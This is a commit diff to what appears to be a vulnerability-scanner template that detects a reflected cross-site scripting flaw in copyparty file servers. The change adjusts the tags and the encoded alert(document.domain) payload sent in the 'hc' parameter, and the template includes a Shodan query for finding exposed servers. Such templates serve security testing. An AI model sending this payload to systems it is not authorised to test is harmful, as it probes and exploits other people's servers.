Update copyparty-xss.yaml
parent
0e832cf68e
commit
a610c3d05a
|
@ -13,19 +13,20 @@ info:
|
|||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"copyparty"
|
||||
tags: copyparty,xss,unauthenticated
|
||||
tags: copyparty,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E"
|
||||
- "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<a href="/"><script>alert(document.domain);</script>'
|
||||
- '<a href="/"><script>alert(document.domain)</script>'
|
||||
- 'choose your OS'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue